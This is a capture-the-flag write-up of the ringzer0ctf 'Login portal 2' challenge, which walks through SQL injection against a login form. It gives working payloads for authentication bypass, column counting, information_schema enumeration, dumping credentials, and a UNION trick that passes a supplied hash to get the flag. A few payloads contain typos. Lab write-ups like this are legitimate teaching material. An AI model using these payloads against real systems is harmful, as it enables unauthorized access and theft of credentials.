CTF ringzer0ctf — Login portal 2

We back again with one of the most interesting challenges in SQL injection, I’ve learned more and more from this challenge and I hope you learn also from this writeup

Challenge link https://ringzer0ctf.com/challenges/4

The challenge is login portal or login form, at the first we try to inject SQL injection payloads like ‘ and something like this but the result is username/password wrong

so let’s try something more clever, we will try

username = admin’ or 1=1 — -

Note that the result is contain one username of the users, i think that the system is take the user input and pass it to the system and return the first username in the columns if the user input is wrong, this is the validation technique

Now we have the username, let’s try to get the password, we’ll try another technique by knowing how number of columns.

username = admin’ union select 1 # → true

username = admin’ union select 2 # → true

username = admin’ union select 3 # → false

Nice, the number of columns is 2, let’s know the vulnerable columns from this 2 columns.

Nice, the vulnerable one is the first column, we will work on it to dump the password

The normal process is to dump the tables name → the columns name from specific table → dump the data from specific column

let’s try to know the tables name

username=-admin’ union select table_name,2 from infromation_schema.tables #

I think the table: users is more interest to discover it, let’s discover the columns name

username = admin’ union select column_name,2 from information_schema.columns where table_name=”users”

Now we have 2 columns username and password, let’s dump its data

username = admin’ union select username,2 form users # → get the username

username = admin’ union select password,2 form users # → get the password

Now let’s try to login with this credentials but unfortunately it’s not valid. The reason is the password is hashed not real plain text so i tried to break the hash by hashcat and another online websites but no result interesting, so the only way now is to search about database password hashing algorithm, I’ve found this source to know that the hash algorithm :

SHA1(UNHEX(SHA1(“this_is_a_random_string”)))

so I tried to edit my payload to be like this

username=admin’ union select username, sha(‘ ’) from users #

We have the flag but also you can get the hashed value which we get before and unhex it and insert it to the payload to be like this

username=admin’ union select username, sha(‘ unhexed_hashed_value’) from users #

and you will get the flag also.

Thanks for reading and i hope to learn something new from this challenge ❤

Offensive Security Enthusiast